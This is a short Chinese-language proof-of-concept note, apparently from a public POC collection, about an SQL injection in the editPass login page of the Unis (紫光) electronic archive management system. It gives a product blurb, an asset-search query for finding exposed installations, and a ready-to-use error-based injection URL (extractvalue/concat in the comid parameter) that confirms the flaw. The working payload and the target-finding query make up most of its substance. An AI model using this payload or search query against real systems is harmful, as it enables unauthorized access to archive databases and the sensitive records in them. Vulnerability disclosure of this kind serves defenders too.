POC/wpoc/紫光档案管理系统/紫光档案管理系统editPass存在SQL注入漏洞.md

紫光档案管理系统editPass存在SQL注入漏洞

一、漏洞简介

紫光电子档案管理系统是一款专业的电子档案管理软件，旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能，能够提供全面的档案管理解决方案。同时，紫光电子档案管理系统还拥有智能化的分类和归档功能，可以自动识别文件类型和属性，实现快速分类和高效管理。用户只需简单操作，就能轻松实现对各类电子档案的整理、查询和备份，极大提升了工作效率和信息安全性。紫光档案管理系统editPass存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

• 紫光档案管理系统

三、资产测绘

• hunterapp.name="紫光档案管理系统"
• 特征

四、漏洞复现

/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))

更新: 2024-02-29 23:55:41
原文: https://www.yuque.com/xiaokp7/ocvun2/mqsvv42n8mikbt25